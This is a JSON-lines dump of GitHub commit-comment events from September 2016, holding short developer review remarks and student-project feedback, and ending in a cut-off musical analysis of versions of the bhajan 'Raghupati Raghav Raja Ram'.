{"id":"4580786288","type":"CommitCommentEvent","actor":{"login":"rteki"},"repo":{"name":"rteki/University_Labs"},"payload":{"comment":{"id":19072546,"position":null,"line":null,"path":null,"commit_id":"6ff84ba5ec352b817f95ce99b4cdfa247928b07b","created_at":"2016-09-18T22:51:44Z","updated_at":"2016-09-18T22:51:44Z","body":"Please read for understanding."}},"created_at":"2016-09-18T22:51:44Z"}
{"id":"4580793577","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19072554,"position":null,"line":null,"path":null,"commit_id":"74fa6f64498dc008398360fbbafdce2c3b5aa46f","created_at":"2016-09-18T22:57:35Z","updated_at":"2016-09-18T22:57:35Z","body":"![screenshot002](https://cloud.githubusercontent.com/assets/6500800/18619711/9ae12c2a-7db8-11e6-9078-b4ef8e4acde3.png)\r\n"}},"created_at":"2016-09-18T22:57:35Z"}
{"id":"4580799540","type":"CommitCommentEvent","actor":{"login":"ashvina"},"repo":{"name":"mycFelix/heron"},"payload":{"comment":{"id":19072558,"position":18,"line":33,"path":"website/content/docs/operators/deployment/schedulers/yarn.md","commit_id":"38be3f6844db54f800c2da380530e718dc782a97","created_at":"2016-09-18T23:01:43Z","updated_at":"2016-09-18T23:01:43Z","body":"While using `extra-launch-classpath` is preferred, I think it would be useful to let the user know about the second option too (i.e. make a copy of the jars). Accordingly, just adding how to use classpath option should be sufficient. What do you think?"}},"created_at":"2016-09-18T23:01:43Z"}
{"id":"4580803700","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":19072563,"position":null,"line":null,"path":null,"commit_id":"db6a46b7f0ef9a4b28f2ce26927577ee2aece28e","created_at":"2016-09-18T23:03:46Z","updated_at":"2016-09-18T23:03:46Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;LmBcUpy9&#x2F;14-bugfix-newspaper-sometimes-scrapes-articles-from-unlisted-domains\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUGFIX: newspaper sometimes scrapes articles from unlisted domains.</a>"}},"created_at":"2016-09-18T23:03:46Z"}
{"id":"4580804637","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"jeffersonccomp/EDL"},"payload":{"comment":{"id":19072564,"position":null,"line":null,"path":null,"commit_id":"d71b8566d893b4883a238a3f727b813effc26f92","created_at":"2016-09-18T23:04:22Z","updated_at":"2016-09-18T23:04:22Z","body":"Jefferson, a formatação do texto não está ok. Veja como aparece pra mim:\r\nhttps://github.com/jeffersonccomp/EDL/blob/d71b8566d893b4883a238a3f727b813effc26f92/trabalhos/trabalho-01/artigo.md\r\n"}},"created_at":"2016-09-18T23:04:22Z"}
{"id":"4580806332","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":19072566,"position":null,"line":null,"path":null,"commit_id":"b9fe39a26e8811d47c51736508cfc6efaffc1053","created_at":"2016-09-18T23:05:35Z","updated_at":"2016-09-18T23:05:35Z","body":"I edited it, you are shtty at templates"}},"created_at":"2016-09-18T23:05:35Z"}
{"id":"4580810685","type":"CommitCommentEvent","actor":{"login":"MAL315"},"repo":{"name":"super3/peercoin.net"},"payload":{"comment":{"id":19072569,"position":null,"line":null,"path":null,"commit_id":"af6dc2ebd8fa2f4b5f68684c23cd3a3b152f6463","created_at":"2016-09-18T23:08:29Z","updated_at":"2016-09-18T23:08:29Z","body":"Meant resubmitting pull #264 (not 269)"}},"created_at":"2016-09-18T23:08:29Z"}
{"id":"4580813103","type":"CommitCommentEvent","actor":{"login":"Smart4296"},"repo":{"name":"TeamKuiper/Redoxiation"},"payload":{"comment":{"id":19072573,"position":null,"line":null,"path":null,"commit_id":"192548e2ba44ded53a41b7f24499b05233983781","created_at":"2016-09-18T23:10:05Z","updated_at":"2016-09-18T23:10:05Z","body":"아니 멀티블록이래\n다음 개발은..?"}},"created_at":"2016-09-18T23:10:05Z"}
{"id":"4580816373","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Rafaustino/EDL"},"payload":{"comment":{"id":19072576,"position":null,"line":null,"path":null,"commit_id":"ad0c04ccf67affba3a23a529c3254917846ecdd5","created_at":"2016-09-18T23:12:13Z","updated_at":"2016-09-18T23:12:13Z","body":"A colisão está correta?"}},"created_at":"2016-09-18T23:12:13Z"}
{"id":"4580816743","type":"CommitCommentEvent","actor":{"login":"Isotronic"},"repo":{"name":"baharboutique/baharboutique.github.io"},"payload":{"comment":{"id":19072577,"position":null,"line":null,"path":null,"commit_id":"9c0412eecd7c1ee3989c1d8c7453122d4d358006","created_at":"2016-09-18T23:12:27Z","updated_at":"2016-09-18T23:12:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KQDvGHuL&#x2F;44-produkte-kontrollieren-und-fehler-notieren\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Produkte kontrollieren und Fehler notieren</a>"}},"created_at":"2016-09-18T23:12:27Z"}
{"id":"4580821936","type":"CommitCommentEvent","actor":{"login":"adictovirtual"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":19072582,"position":7,"line":180,"path":"test/unit/models/root.js","commit_id":"5f72fca227b02f1eaa4d629340c9d22aebf6f9ed","created_at":"2016-09-18T23:15:55Z","updated_at":"2016-09-18T23:15:55Z","body":"why did you delete this  test ? "}},"created_at":"2016-09-18T23:15:55Z"}
{"id":"4580830167","type":"CommitCommentEvent","actor":{"login":"litaotaoGitHub"},"repo":{"name":"litaotaoGitHub/Hello-Word"},"payload":{"comment":{"id":19072585,"position":null,"line":null,"path":null,"commit_id":"46b62c3fd2fd6981e31da510618eeb7e714acfc4","created_at":"2016-09-18T23:21:25Z","updated_at":"2016-09-18T23:21:25Z","body":"aaa"}},"created_at":"2016-09-18T23:21:25Z"}
{"id":"4580831052","type":"CommitCommentEvent","actor":{"login":"chrisabrams"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":19072586,"position":7,"line":180,"path":"test/unit/models/root.js","commit_id":"5f72fca227b02f1eaa4d629340c9d22aebf6f9ed","created_at":"2016-09-18T23:22:02Z","updated_at":"2016-09-18T23:22:02Z","body":"This whole test file was deleted actually. I've been moving things over to it's own repo."}},"created_at":"2016-09-18T23:22:02Z"}
{"id":"4580832224","type":"CommitCommentEvent","actor":{"login":"agucova"},"repo":{"name":"micahflee/passphraseme"},"payload":{"comment":{"id":19072590,"position":null,"line":null,"path":null,"commit_id":"db41814af8055e8358dd339f5800e73d8f95692a","created_at":"2016-09-18T23:22:49Z","updated_at":"2016-09-18T23:22:49Z","body":"I was actually having problems due to the giant line with Atom, this fixed it. But you need to scroll a lot to find the code!"}},"created_at":"2016-09-18T23:22:49Z"}
{"id":"4580837430","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"igortouguinho/EDL"},"payload":{"comment":{"id":19072597,"position":null,"line":null,"path":null,"commit_id":"c2e7fd0c3b1d8e4de52f9631a9fb3599e7a1d742","created_at":"2016-09-18T23:26:21Z","updated_at":"2016-09-18T23:26:21Z","body":"Igor e Henrique, vocês têm 6.5 pontos pra distribuir entre os dois, como faço?"}},"created_at":"2016-09-18T23:26:21Z"}
{"id":"4580838853","type":"CommitCommentEvent","actor":{"login":"victorlevasseur"},"repo":{"name":"4ian/GD"},"payload":{"comment":{"id":19072602,"position":null,"line":null,"path":null,"commit_id":"6ac34ee7e3065361c16a3a3c82fea300a115c1ed","created_at":"2016-09-18T23:27:23Z","updated_at":"2016-09-18T23:27:23Z","body":"New version incoming ?"}},"created_at":"2016-09-18T23:27:23Z"}
{"id":"4580839289","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"TheMarmottin/Converter"},"payload":{"comment":{"id":19072604,"position":null,"line":null,"path":null,"commit_id":"bbcdc45ca89380fde79e2c4e26abbbfbe4b0bb3c","created_at":"2016-09-18T23:27:35Z","updated_at":"2016-09-18T23:27:35Z","body":"You may find this helpful\r\nhttps://github.com/EMFTeam/EMF/tree/alpha/EMF%2BVanilla/eu4_converter\r\n\r\nIt is how we handled EU4 conversion for EMF titles (there's 2), cultures (4), and religions (many, same as SWMH)."}},"created_at":"2016-09-18T23:27:35Z"}
{"id":"4580840044","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"lucascomp/EDL"},"payload":{"comment":{"id":19072606,"position":null,"line":null,"path":null,"commit_id":"19d239138c7cddf570e9385b64ca590ee518c2ff","created_at":"2016-09-18T23:28:10Z","updated_at":"2016-09-18T23:28:10Z","body":"O trabalho 4 é individual."}},"created_at":"2016-09-18T23:28:10Z"}
{"id":"4580841621","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072607,"position":26,"line":762,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T23:29:18Z","updated_at":"2016-09-18T23:29:18Z","body":"Done."}},"created_at":"2016-09-18T23:29:18Z"}
{"id":"4580843791","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072609,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T23:30:49Z","updated_at":"2016-09-18T23:30:49Z","body":"This doesn't need to be a range because the font selection algorithm will choose the @font-face declaration with the closest value (for some definition of \"closest\"). Once the @font-face block is chosen, the requested value will be applied."}},"created_at":"2016-09-18T23:30:49Z"}
{"id":"4580843877","type":"CommitCommentEvent","actor":{"login":"githubapprentice"},"repo":{"name":"drlippman/IMathAS"},"payload":{"comment":{"id":19072610,"position":329,"line":329,"path":"imascore.css","commit_id":"ef438817d25b14544817877912106922d68c1a07","created_at":"2016-09-18T23:30:52Z","updated_at":"2016-09-18T23:30:52Z","body":"Other than whitespace, this is essentially the only line that changed:  colon -> equal"}},"created_at":"2016-09-18T23:30:52Z"}
{"id":"4580844427","type":"CommitCommentEvent","actor":{"login":"sivakumarloganathansc"},"repo":{"name":"petewarden/tensorflow"},"payload":{"comment":{"id":19072612,"position":2,"line":48,"path":"tensorflow/contrib/makefile/compile_ios_protobuf.sh","commit_id":"5582e52b4d832d60bf9f24932856cab48d94ae91","created_at":"2016-09-18T23:31:16Z","updated_at":"2016-09-18T23:31:16Z","body":"Should this be 8.2 as well? I remember some warning while compiling tensorflow with different protobuf version."}},"created_at":"2016-09-18T23:31:16Z"}
{"id":"4580844453","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072613,"position":13,"line":758,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T23:31:18Z","updated_at":"2016-09-18T23:31:18Z","body":"Done."}},"created_at":"2016-09-18T23:31:18Z"}
{"id":"4580845809","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":19072616,"position":null,"line":null,"path":null,"commit_id":"a493c5f013aac90b458c1bb267d2c530f28acbcd","created_at":"2016-09-18T23:32:11Z","updated_at":"2016-09-18T23:32:11Z","body":"O jogo está caprichado, mas gostaria que vocês colocassem o código fonte aqui e não o `.rar`."}},"created_at":"2016-09-18T23:32:11Z"}
{"id":"4580845861","type":"CommitCommentEvent","actor":{"login":"githubapprentice"},"repo":{"name":"drlippman/IMathAS"},"payload":{"comment":{"id":19072617,"position":1178,"line":313,"path":"imascore.css","commit_id":"ef438817d25b14544817877912106922d68c1a07","created_at":"2016-09-18T23:32:13Z","updated_at":"2016-09-18T23:32:13Z","body":"Other than whitespace, this is essentially the only line that changed: colon -> equal"}},"created_at":"2016-09-18T23:32:13Z"}
{"id":"4580847450","type":"CommitCommentEvent","actor":{"login":"jquatier"},"repo":{"name":"awolden/brakes"},"payload":{"comment":{"id":19072622,"position":null,"line":null,"path":null,"commit_id":"4b5d86ef1e247102f615c060ff4e610dc46d7e32","created_at":"2016-09-18T23:33:20Z","updated_at":"2016-09-18T23:33:20Z","body":"😬 "}},"created_at":"2016-09-18T23:33:20Z"}
{"id":"4580848791","type":"CommitCommentEvent","actor":{"login":"blckmn"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19072626,"position":7,"line":87,"path":"src/main/drivers/serial_usb_vcp_hal.c","commit_id":"a78aab94bb6c857bd061f66f1e91e5462124d774","created_at":"2016-09-18T23:34:17Z","updated_at":"2016-09-18T23:34:17Z","body":"It looks like it was used outside the while initially, but is not any longer - so its possibly a remnant."}},"created_at":"2016-09-18T23:34:17Z"}
{"id":"4580849207","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":19072627,"position":null,"line":null,"path":null,"commit_id":"31576cb48021aea8db00e719b19bdd23c1f7a0b9","created_at":"2016-09-18T23:34:36Z","updated_at":"2016-09-18T23:34:36Z","body":"Não estou achando o screenshot."}},"created_at":"2016-09-18T23:34:36Z"}
{"id":"4580857462","type":"CommitCommentEvent","actor":{"login":"Awesomekangaroo"},"repo":{"name":"Awesomekangaroo/html-email"},"payload":{"comment":{"id":19072631,"position":null,"line":null,"path":null,"commit_id":"cf12bd63f617d5386814346f0714a794f278cc9f","created_at":"2016-09-18T23:40:54Z","updated_at":"2016-09-18T23:40:54Z","body":"Not needed"}},"created_at":"2016-09-18T23:40:54Z"}
{"id":"4580859067","type":"CommitCommentEvent","actor":{"login":"LegacyHardware"},"repo":{"name":"EdgeAOSP/platform_manifest"},"payload":{"comment":{"id":19072633,"position":null,"line":null,"path":null,"commit_id":"a3f9cc7a571f2b0e01cff1b8c5819f6ee0c74369","created_at":"2016-09-18T23:42:10Z","updated_at":"2016-09-18T23:42:10Z","body":"Rookie mistake. 😂 "}},"created_at":"2016-09-18T23:42:10Z"}
{"id":"4580862527","type":"CommitCommentEvent","actor":{"login":"leo424y"},"repo":{"name":"hackmdio/hackmd"},"payload":{"comment":{"id":19072636,"position":null,"line":null,"path":null,"commit_id":"3840308ab6cbda7a9a9aa57f1700165e7c95d250","created_at":"2016-09-18T23:44:47Z","updated_at":"2016-09-18T23:44:47Z","body":"Thanks for your hard working. Cheers!!"}},"created_at":"2016-09-18T23:44:47Z"}
{"id":"4580862571","type":"CommitCommentEvent","actor":{"login":"SaraGinsburg"},"repo":{"name":"SaraGinsburg/hello-world"},"payload":{"comment":{"id":19072637,"position":null,"line":null,"path":null,"commit_id":"7422c36309c540616db95d9966a1366931d834a8","created_at":"2016-09-18T23:44:49Z","updated_at":"2016-09-18T23:44:49Z","body":"I am new to GitHub.\r\nLooking forward to this new experience"}},"created_at":"2016-09-18T23:44:49Z"}
{"id":"4580864509","type":"CommitCommentEvent","actor":{"login":"SergeyMalkin"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072644,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T23:46:15Z","updated_at":"2016-09-18T23:46:15Z","body":"This would work if matching goes in one direction, but we search from normal outwards. If I have font resource which supports weights 300-600, which weight should I specify so it is matched for both 300 and 600 specified weight?\r\nHaving explicit ranges also makes it clear for the reader of @font-face rule what ranges are supported and possibly clamp specified values to it."}},"created_at":"2016-09-18T23:46:15Z"}
{"id":"4580866107","type":"CommitCommentEvent","actor":{"login":"nickzman"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":19072646,"position":null,"line":null,"path":null,"commit_id":"227ee9d84d390f37c28dfe43ceda308c6083b1f6","created_at":"2016-09-18T23:47:31Z","updated_at":"2016-09-18T23:47:31Z","body":"Sorry about that; I forgot."}},"created_at":"2016-09-18T23:47:31Z"}
{"id":"4580866379","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":19072647,"position":null,"line":null,"path":null,"commit_id":"f161ed870f0915030c4db8b47c7dd5d8e5ae3aa4","created_at":"2016-09-18T23:47:44Z","updated_at":"2016-09-18T23:47:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;nELu6crg&#x2F;16-implement-clicked-skipped-model-s\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement Clicked&#x2F;Skipped model(s)</a>"}},"created_at":"2016-09-18T23:47:44Z"}
{"id":"4580866689","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":19072649,"position":null,"line":null,"path":null,"commit_id":"75283b02e2622374367d4f1381e606259b3d3172","created_at":"2016-09-18T23:47:57Z","updated_at":"2016-09-18T23:47:57Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;nELu6crg&#x2F;16-implement-clicked-skipped-model-s\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement Clicked&#x2F;Skipped model(s)</a>"}},"created_at":"2016-09-18T23:47:57Z"}
{"id":"4580866824","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":19072650,"position":null,"line":null,"path":null,"commit_id":"f161ed870f0915030c4db8b47c7dd5d8e5ae3aa4","created_at":"2016-09-18T23:48:02Z","updated_at":"2016-09-18T23:48:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;nELu6crg&#x2F;16-implement-clicked-skipped-model-s\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement Clicked&#x2F;Skipped model(s)</a>"}},"created_at":"2016-09-18T23:48:02Z"}
{"id":"4580868982","type":"CommitCommentEvent","actor":{"login":"NoSpamDan"},"repo":{"name":"slim-opt/device_oneplus_onyx"},"payload":{"comment":{"id":19072654,"position":null,"line":null,"path":null,"commit_id":"38b5ee2d1b88f20eafe2399933e3fb2388781e8c","created_at":"2016-09-18T23:49:52Z","updated_at":"2016-09-18T23:49:52Z","body":"https://bugs.slimroms.org/issues/114\n\nOn Sun, Sep 18, 2016 at 11:39 AM, martin coulon <notifications@github.com>\nwrote:\n\n> yeah, i disabled because no 7.0 branches yet on slim\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/slim-opt/device_oneplus_onyx/commit/38b5ee2d1b88f20eafe2399933e3fb2388781e8c#commitcomment-19071095>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE6Q4F6MqGSA37o5UNLr_AUk6P49hhbjks5qrVtJgaJpZM4J_6dT>\n> .\n>\n"}},"created_at":"2016-09-18T23:49:52Z"}
{"id":"4580870003","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072655,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T23:50:39Z","updated_at":"2016-09-18T23:50:39Z","body":"Specify it twice, and rely on the cache to only download the file once.\r\n\r\nLet's discuss this topic at TPAC tomorrow."}},"created_at":"2016-09-18T23:50:39Z"}
{"id":"4580871432","type":"CommitCommentEvent","actor":{"login":"shashwat-vik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19072657,"position":null,"line":null,"path":null,"commit_id":"7faa88091bb4454c83cbd31688ee662f8d354e3e","created_at":"2016-09-18T23:51:47Z","updated_at":"2016-09-18T23:51:47Z","body":"@anantharam : Yes I made the comparison. The actual dialect that was generated kept the **Dialect.doublequote** : _**‘False’**_, which is **_'True'_** in excel.\r\nAlso the **'Dialect.escapechar'** was **_‘None’_**. Thereby any special meaning with the sequence **\"\"\"**, was skipped.\r\n\r\nAnd this irregularity manifested itself in a field that started with **doublequote** in **_sample_big.csv_**.\r\nReason for Issue #29 ."}},"created_at":"2016-09-18T23:51:47Z"}
{"id":"4580873434","type":"CommitCommentEvent","actor":{"login":"ironmaniiith"},"repo":{"name":"ironmaniiith/temp"},"payload":{"comment":{"id":19072661,"position":null,"line":null,"path":null,"commit_id":"c10eda7d7aaeb4400255535eb6b0f5f164319be0","created_at":"2016-09-18T23:53:20Z","updated_at":"2016-09-18T23:53:20Z","body":"## Raghupati Raghav Raja Ram\r\n\r\nRaghupati raghav raja ram is a popular hindi devotional song (**Bhajan**), sung in praise of _Lord Rama_. \r\n\r\nThe original lyrics of this song were taken from the Hindi text \"Shri Nama Ramayanam\", written by Lakshmanacharya.\r\n\r\nHowever, the most popular version of this bhajan exists with a different lyrics. This bhajan being one of the favourite of Mahatma Gandhi is also known by the gandhian bhajan, (the lyrics are referred to as **Gandhian lyrics**) which are as follows\r\n\r\n    रघुपति राघव राजाराम,\r\n    पतित पावन सीताराम\r\n    सीताराम सीताराम,\r\n    भज प्यारे तू सीताराम\r\n    ईश्वर अल्लाह तेरो नाम,\r\n    सब को सन्मति दे भगवान\r\n\r\n\r\nLink to various versions of bhajans:\r\n* https://www.youtube.com/watch?v=yEyvAZOvADw\r\n* https://www.youtube.com/watch?v=6JWccfP1Sd8\r\n* https://www.youtube.com/watch?v=Wp1gOcBaneQ\r\n* https://www.youtube.com/watch?v=DJKipa0ryVI\r\n* https://www.youtube.com/watch?v=XybXCDs6UD0\r\n* https://www.youtube.com/watch?v=H44U3vvynyU\r\n* https://www.youtube.com/watch?v=MrTjd7EG0oY\r\n* https://www.youtube.com/watch?v=4QVe9SzkVfg\r\n* https://www.youtube.com/watch?v=MoeC0JEEt9U\r\n* https://www.youtube.com/watch?v=8uc42JyuOXY (tamil)\r\n* https://www.youtube.com/watch?v=FcTGemHDF8M\r\n* https://www.youtube.com/watch?v=m67GgToBV8g\r\n* https://www.youtube.com/watch?v=773n8rRtu1g\r\n* https://www.youtube.com/watch?v=N0Puo8rpLzg (a variation invoving sai naam as well)\r\n\r\n---\r\n\r\n### Analysis of selected versions\r\n\r\n#### 1. Link to video: [here](https://www.youtube.com/watch?v=yEyvAZOvADw)\r\n\r\nBeginnning: The initial mood of the song exhibits the feel of a temple kind of place (we can hear the sound of Temple's bell in the very beginning)\r\n\r\nAlso the bhajan starts with a slow tempo, and after completion of one line, the tempo of the bhajan increases, which follows in the bhajan throughout (except the end)\r\n\r\nThe composition follows this pattern:\r\n\r\n1. The male singer sings a line.\r\n2. The same line is repeated by the chorus.\r\n\r\nWith a exception towards the end of the paragraph, where the singer and chorus both sings together.\r\n\r\n\r\nAlso at around 2:04 of the song, the singer introduces a variation of the line \"Raghupati raghav raja ram\", which is different from the usual one that is found in the complete composition.\r\n\r\nThe same type of variation is seen with the line \"Ishwar allah tero naam\", at around 6:25\r\n\r\n\r\nThe instruments that are used in the composition (which I know and was able to identify): **Tabla**, **sitar**, **manjeera**, \r\n\r\nGati of the song: **4**\r\n\r\nA usual thing that is seen with the sitar in this composition is that, at the end of the line by the singer, the sitar adds some swaras. (with some deviation), which makes the composition more beautiful. Ex: 1:14, 1:37, 3:06, 3:28 etc.\r\n\r\nHere a special feature of this bhajan is that, there are some lines, such as \"Sitaram, sitaram, bhaja pyare tu Sitaram\", which is sung many a times, which tries to establish the feel of the composition (by highlighting main features what this bhajan is trying to convey). The whole point of the bhajan is that, there are various forms of Rama, but all forms are one only, and just praise the Lord Rama in every form.\r\n\r\nEnding: During the end, the tempo of the song increases with the continous repetition of the line \"Raghupati raghav raja ram, patita paavan sita raam\"\r\n\r\n**Swara Analysis**: \r\n\r\nThe song structure (which I was able to find) is like this:\r\n\r\n    dha re re re re ga re sa ni (Raghupati raaghav)\r\n    sa ga ga pa ma+ pa (Raaja raaam)\r\n    ga ma ga re sa ni (pateet paavan)\r\n    sa ma ga re (sita raam)\r\n  \r\n    ma+ ma+ ma+ ma+ re (Ishvara allah)\r\n    ma+ pa pa ma+ pa (tero naam)\r\n    ga pa dha ni- dha (sabko sanmati)\r\n    ma [ga ma ga] re (de.. bhagwan)\r\n\r\nAnd almost same type of variation (with little bit modifications as per the lyrics) repeats in the whole composition\r\n\r\nNote that, here **ma+** is the Teevra Ma and **ni-** is the komal Ni, rest all are shudh.\r\n\r\nHence all the swaras coming in the compositions are:\r\n\r\n`Sa, Re, Ga, Ma, Ma+, Pa, Dha, Ni-, Ni+`\r\n\r\nExpected Raga: `Kapi`\r\n\r\n---\r\n\r\n#### 2. Link to video: [here](https://www.youtube.com/watch?v=6JWccfP1Sd8)\r\n\r\nBeginning: The beginning of this song is very simple. The initial rhythm is given by the tabla, and the singer follows. Here the song begins with a tempo which maintains throught the composition (unlike the composition #1)\r\n\r\nThere are 2 main difference in this song and composition #1\r\n\r\n1. Fast tempo.\r\n2. Different scale.\r\n3. Dominance of table.\r\n\r\nThe gati of this song is also **4**\r\n\r\nHere a variation is seen with tabla, where the table player plays fast tabla towards the end of a line (ex. at duration: 2:11, 3:15, 4:04 etc. ) thing that is seen with table\r\n\r\nAlso the instruments used in this composition are: **Tabla**, **Manjeera**, **Sitar**, but the dominance of Tabla is much more observed\r\n\r\n---\r\n\r\n#### 3. Link to the video: [here](https://www.youtube.com/watch?v=Wp1gOcBaneQ)\r\n\r\nThis composition is by **MS Subbulaksmi**. The beginning of this composition is different than the above two compositions, here the singer starts and then the instruments follow.\r\n\r\nThe composition is mainly sung by two singers, where singing takes place by both one after the other (the second singer repeats the first one)\r\n\r\nHere the dominance of instruments is very less and mainly the singer's voice is observed in the complete composition.\r\n\r\nThe tempo of the song remains constant till 2:24, where the tempo of the composition increases (doubles).\r\n\r\nThe main factor that differentiates it from the other is the **Improvisation** seen in the song. For example at 3:34, we see an improvisation, which **changes the rhythm and the swaras** coming in the song. Also the additional lyrics are added by the singers after this time.\r\n\r\nThe singer tried lot of variations in rhythm and swaras occuring in the song, however, the gati of the song remains **4**\r\n\r\nWe also observe that the tempo in the bhajan gradually increases as the bhajan proceeds, becoming the fastest at the end.\r\n\r\n---\r\n\r\n#### 4. Link to the video: [here](https://www.youtube.com/watch?v=DJKipa0ryVI)\r\n\r\nBeginning: Here also the song starts with the instrumental part, and then the singer follows.\r\n\r\nThe beat of the song is slow as compared to the above versions, and it maintains throughout (till the end).\r\n\r\nGati of the bhajan: **4**\r\n\r\nThe same pattern of singer singing first and then chorus repeating is seen in this composition as well.\r\n\r\nThe main differentiting factor with this composition is that, the swaras, style and the mood of this composition is completely different then the other ones.\r\n\r\nAlso the singer didn't try to introduce the variaion in the tempo (which is usually seen in all the other compositions)\r\n\r\nThe instruments are also very less dominant in this version.\r\n\r\nThe main instruments that can be identified are: **Tabla**, **Sitar**, **Keyboard**, **Flute** (which was not seen in any other composition)\r\n\r\nThis composition also introduces the lyrics which is not the common Gandhain lyrics (explained above).\r\n\r\nAs the swara occuring in this composition is different, the swara analysis (that I could identify) are as follows:\r\n\r\n    ga ga ga ga ga ga ga (raghupati raghav)\r\n    ma ga [re sa] ni re (raja raam)\r\n\r\n    sa [ga ma] ma ma ga re (patita paavan)\r\n    ga re sa ni sa (seeta raam)\r\n\r\n    \r\nSpecial features: Appearance of dha- (around 1:50) and ni- (around 3:23), the placement and occurence of swaras of the paragraph (ex. starting from 2:08, or 3:19) are very much different from the usual swaras of raghupati raghav raja raam line\r\n\r\n---\r\n\r\n#### 5: Link to the video: [here](https://www.youtube.com/watch?v=MrTjd7EG0oY)\r\n\r\nSinger: **Shankar Mahadevan**\r\n\r\nMain swaras in sthayi (in the initial variation): `sa re ga- ma pa dha ni`\r\n\r\nBeginnning: Instruments begin, then singer starts. \r\n\r\nThis is a classic example where the composers tried to combine both the **Indian and western** type of music, hence it exhibits the feel of both the bhajan and somewhat \"modern\" type of bhajan.\r\n\r\nThe instruments seen in this are: **Piano**, **flute**, **manjeera**, **octopad**, **drums**, **keyboard**, **tabla** \r\n\r\nGati: **4**\r\n\r\nSwara analysis (for the first composition)\r\n\r\n    re re pa pa pa pa pa (raghupati raghav)\r\n    pa ga- pa ma ga (raja ram)\r\n    re re re pa pa pa (patita pavan)\r\n    ma ma pa (seeta ram)\r\n\r\n    pa dha ni sa sa (Ishwar allah)\r\n    dha [pa ma] dha pa ma (tero naam)\r\n    ma ma dha dha dha (sabko sanmati)\r\n    dha re sa ni ni (de bhagwan)\r\n\r\nKey points: In the sthayi (starting part), we see the occurence of ga-, but in the later paragraphs, we see the occurence of ga.\r\n\r\nDrastic change in the composition occurs after 4:40. Here the complete rhythm and mood of the song changes, and the composition looks completely different from what it was prior to 4:40. It sound like some modern western composition here. \r\n\r\nAt 6:30, we observe that the bhajan changes it's form to the most famous type of bhajan, in the fast beat (commonly sung, the one like the #1 and #2), whose scale differ and the swarasthanas are:\r\n    \r\n    pa pa pa pa pa dha pa ma ga (raghupati raghav)\r\n    ma dha, dha sa ni sa (raja raam)\r\n    dha ni- dha pa ma ga (patita pavan)\r\n    ma ni- dha pa (sita ram)\r\n\r\n    ni ni ni ni [ni dha pa]  (Ishwar allah)\r\n    ni sa sa ni sa (tero naam)\r\n    dha sa re ga- re (sabko sanmati) \r\n    sa ni- dha pa (de bhagwan)\r\n\r\nWhere the main swarasthanas occuring are: `sa re ga ma pa dha ni- ni`\r\nand ga- for once (sabko sanmati)\r\n\r\nThe notes are in accordance with _Khamaj 